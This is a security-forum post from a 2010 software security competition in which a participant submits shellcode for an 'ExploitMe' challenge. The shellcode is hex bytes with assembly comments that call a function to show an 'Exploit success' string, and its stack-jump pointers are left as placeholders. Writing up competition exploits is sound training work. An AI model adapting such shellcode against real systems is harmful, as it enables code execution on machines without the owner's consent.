首页
社区
课程
招聘
问答 CTF 排行榜 知识库 工具下载 看雪峰会 看雪商城 证书查询
  1. 看雪社区
  2. 7)腾讯公司2010软件安全竞赛
    3. 发新帖
[原创]交卷,还是提交个稳定的版本吧
2010-10-19 19:28 2995

[原创]交卷,还是提交个稳定的版本吧

rickywong 活跃值
2010-10-19 19:28
2995
太多硬编码不能行,过度追求字节数而不稳定这就违背了信息安全的主旨了,所以提交的这个答卷除了堆栈跳转不得不硬编码之外,其他都是偏移量,完全稳定,在Win XP SP3下通过
堆栈基址是 0x00140000,如果是在堆栈基址是0x00130000的机器调试,需要修改两个跳转指针

dd xx xx xx 00 ;指针2
5a						pop edx 
6a 00						push 0
ff 72 57					push dword ptr [edx + 57] ;"ExploitMe"
83 c2 60 					add edx, 0x60
ff d2						call edx
dd 45 00 78 00 70 00 6c 00 6f 00 69 00 74 00 20 00 73 00 75 00 63 00 63 00 65 00 73 00 73 00 00 00 ;字符串
dd xx xx xx 00 ;指针1


共31个非零字节

[培训]《安卓高级研修班(网课)》月薪三万计划,掌握调试、分析还原ollvm、vmp的方法,定制art虚拟机自动化脱壳的方法

上传的附件:
收藏
点赞0
打赏
分享
最新回复 (0)
游客
登录 | 注册 方可回帖
 回帖  表情 雪币赚取及消费
高级回复
返回